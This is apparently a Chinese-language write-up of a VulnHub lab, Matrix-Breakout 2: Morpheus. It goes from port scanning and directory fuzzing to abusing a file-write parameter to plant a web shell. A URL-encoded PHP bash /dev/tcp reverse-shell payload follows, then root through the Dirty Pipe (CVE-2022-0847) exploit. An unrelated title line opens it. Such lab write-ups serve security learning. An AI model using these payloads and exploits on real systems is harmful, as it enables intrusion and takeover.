wap 2.0的网站项目管理网络图

靶机下载地址：
https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
1、信息收集
主机发现 arp-scan-l

看看端口详细信息 nmap -A -T4 -p- 192.168.13.145

访问80端口，发现是个带着图片的界面，没有什么可以传参的地方

2、漏洞发现
查找该网站下的txt,zip,php,html文件
ffuf -u http://192.168.13.145/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html

于是就看到这几个文件：
robots.txt
graffiti.txt
graffiti.php

发现在graffiti.php的输入框输入内容后会保存到graffiti.txt文件中，先抓个包看看变量名

此处有一个file变量，那么改变file变量可以直接对靶机文件修改，升值能随意创建文件

接下来，准备反弹shell

访问试试，白屏就是写入成功

接下来使用蚁剑连接

cd到根目录发现了一个FLAG.txt

cat一下查看内容，结尾出现了一个名叫cypher-neo.png的图片。好像让我去获取一个密码。那就去看看这个png

因为蚁剑的文件不是完整的，可能会有隐藏文件，做个反弹shell双管齐下（一句话需要魔改一下，弄上URL编码，干掉问号和空格和&）

<%3fphp+exec(“/bin/bash±c+‘bash±i+>%26+/dev/tcp/192.168.13.129/4444+0>%261’”);+%3f>

访问192.168.13.145/b.php,反弹成功！

3、提权
查看刚才提示里的图片，在网站上看不有啥，下载下来看看

wget http://192.168.13.145/.cypher-neo.png
binwalk .cypher-neo.png
binwalk 下面是它的常用参数
-E：用于解码和提取已知的文件类型。
-M：在提取过程中自动尝试解密已知的加密算法。
-e：用于提取文件。
-y：用于自动确定文件系统类型。
-f：用于指定要分析的文件格式。
-l：用于显示已知的签名。
-x：用于提取文件系统。
-d：启用调试模式。
-v：显示详细输出。
-R：递归分析。

加–run-as=root，之后目录下会多个目录
binwalk -e .cypher-neo.png --run-as=root

zlib提取不太会，等改天有时间再慢慢看吧
https://www.cnblogs.com/ainsliaea/p/15780903.html
https://blog.csdn.net/qq_40574571/article/details/80164981
从github上找的一个提权脚本
https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/32ca1c6c-01e4-46f3-8ffe-c29d28b8d6a8?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240814%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240814T102734Z&X-Amz-Expires=300&X-Amz-Signature=da267aa55d6b221464632e1fcd22046dd324f2ce1cd1953dcb40a66c6a322da0&X-Amz-SignedHeaders=host&actor_id=108580799&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
回到蚁剑，把文件传上来

cd /var/www/html
chmod +x linpeas.sh

脚本和内核版本全指向了一个CVE-2022-0847的漏洞

接下来就找个exploit，下载好了，就通过蚁剑传上去
https://github.com/r1is/CVE-2022-0847/blob/main/Dirty-Pipe.sh
给权限，再运行
chmod +x Dirty-Pipe.sh
./Dirty-Pipe.sh

提权成功，查看flag
cat /root/FLAG.txt